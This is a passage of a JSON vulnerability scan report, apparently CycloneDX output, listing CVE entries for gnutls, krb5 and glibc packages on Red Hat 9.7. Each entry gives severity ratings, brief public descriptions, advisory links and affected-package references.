          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-3833",
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.4,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.5,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N"
        }
      ],
      "cwes": [
        178
      ],
      "description": "A flaw was found in gnutls. This vulnerability occurs because gnutls performs case-sensitive comparisons of `nameConstraints` labels, specifically for `dNSName` (DNS) or `rfc822Name` (email) constraints within `excludedSubtrees` or `permittedSubtrees`. A remote attacker can exploit this by crafting a leaf certificate with casing differences in the Subject Alternative Name (SAN), leading to a policy bypass where a certificate that should be rejected is instead accepted. This could result in unauthorized access or information disclosure.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-3833"
        },
        {
          "url": "https://access.redhat.com/errata/RHSA-2026:13274"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-3833"
        },
        {
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445763"
        },
        {
          "url": "https://gitlab.com/gnutls/gnutls/-/issues/1803"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-3833"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-3833"
        }
      ],
      "published": "2026-04-30T18:16:30+00:00",
      "updated": "2026-05-07T02:09:04+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "3.8.3-10.el9_7",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/gnutls@3.8.3-10.el9_7?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-40355",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        476
      ],
      "description": "In MIT Kerberos 5 (aka krb5) before 1.22.3, there is a NULL pointer dereference if an application calls gss_accept_sec_context() on a system with a NegoEx mechanism registered in /etc/gss/mech. An unauthenticated remote attacker can trigger this, causing the process to terminate in parse_nego_message.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-40355"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-40355"
        },
        {
          "url": "https://cems.fun/2026/04/27/krb5-two-unauthenticated-network-vulnerabilities.html"
        },
        {
          "url": "https://github.com/krb5/krb5/commit/2e75f0d9362fb979f5fc92829431a590a130929f"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40355"
        },
        {
          "url": "https://web.mit.edu/kerberos/advisories/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40355"
        }
      ],
      "published": "2026-04-28T06:16:03+00:00",
      "updated": "2026-04-28T20:11:56+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.21.1-8.el9_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/krb5-pkinit@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.21.1-8.el9_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/krb5-workstation@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.21.1-8.el9_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libkadm5@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.21.1-8.el9_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/krb5-workstation@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libkadm5@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-40356",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.9,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        191
      ],
      "description": "In MIT Kerberos 5 (aka krb5) before 1.22.3, there is an integer underflow and resultant out-of-bounds read if an application calls gss_accept_sec_context() on a system with a NegoEx mechanism registered in /etc/gss/mech. An unauthenticated remote attacker can trigger this, possibly causing the process to terminate in parse_message.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-40356"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-40356"
        },
        {
          "url": "https://cems.fun/2026/04/27/krb5-two-unauthenticated-network-vulnerabilities.html"
        },
        {
          "url": "https://github.com/krb5/krb5/commit/2e75f0d9362fb979f5fc92829431a590a130929f"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40356"
        },
        {
          "url": "https://web.mit.edu/kerberos/advisories/"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-40356"
        }
      ],
      "published": "2026-04-28T07:16:03+00:00",
      "updated": "2026-04-28T20:11:56+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.21.1-8.el9_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/krb5-pkinit@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.21.1-8.el9_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/krb5-workstation@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.21.1-8.el9_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libkadm5@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "1.21.1-8.el9_6",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/krb5-pkinit@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/krb5-workstation@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/libkadm5@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/krb5-libs@1.21.1-8.el9_6?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4046",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "high"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "medium"
        }
      ],
      "cwes": [
        617
      ],
      "description": "The iconv() function in the GNU C Library versions 2.43 and earlier may crash due to an assertion failure when converting inputs from the IBM1390 or IBM1399 character sets, which may be used to remotely crash an application.\n\n\n\nThis vulnerability can be trivially mitigated by removing the IBM1390 and IBM1399 character sets from systems that do not need them.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-4046"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-4046"
        },
        {
          "url": "https://inbox.sourceware.org/libc-announce/76814edf-cf7f-47ec-979d-2dce0a2c76bf@gotplt.org/T/#u"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-4046"
        },
        {
          "url": "https://packages.fedoraproject.org/pkgs/glibc/glibc-gconv-extra/"
        },
        {
          "url": "https://sourceware.org/bugzilla/show_bug.cgi?id=33980"
        },
        {
          "url": "https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007"
        },
        {
          "url": "https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0007;hb=HEAD"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-4046"
        }
      ],
      "published": "2026-03-30T18:16:19+00:00",
      "updated": "2026-04-20T22:16:23+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7",
          "versions": [
            {
              "version": "2.34-231.el9_7.10",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:080083ce-37b1-4767-82e3-81019887055e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:39521711-89d9-4893-876e-48de62264403/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e471ee93-1a27-47a5-964c-4f4a1831045c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e8c6bd69-d568-4ee0-a2c0-7d5e2fd81c94/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:90c389a7-5b63-4de0-8973-fc9bcd45b10c/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e03ac5fe-5520-4747-ae14-7473b53b2a70/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:d359ca16-fd61-4ce8-a9a0-cba61705e866/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:520ffe2b-80cf-432a-a32a-bf3acdf6728a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:2c9994be-cfe0-4c83-8c26-fcff3fb85011/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ec223d43-28db-4f2d-88e3-d2015266ad6e/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:83b77bbf-a2d8-4a11-9f8b-9dc23be9953a/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:e2d34658-6109-4cd5-ab14-4a3a994c7d13/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:753dc1a7-2212-44ab-bce9-2e6b69a6fe32/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:ba1c22bb-476f-4ef3-8bdc-3e5bc99c1bf7/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-common@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc-minimal-langpack@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        },
        {
          "ref": "urn:cdx:38a4d1bc-055a-4e42-9ed8-eec3ebc7490f/1#pkg:rpm/redhat/glibc@2.34-231.el9_7.10?arch=x86_64&distro=redhat-9.7"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "",
        "response": [
          "update"
        ],
        "detail": null
      }
    },
    {
      "id": "CVE-2026-4105",
      "ratings": [
        {
          "source": {
            "name": "redhat"
          },
          "score": 6.7,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H"
        }
      ],
      "cwes": [
        284
      ],
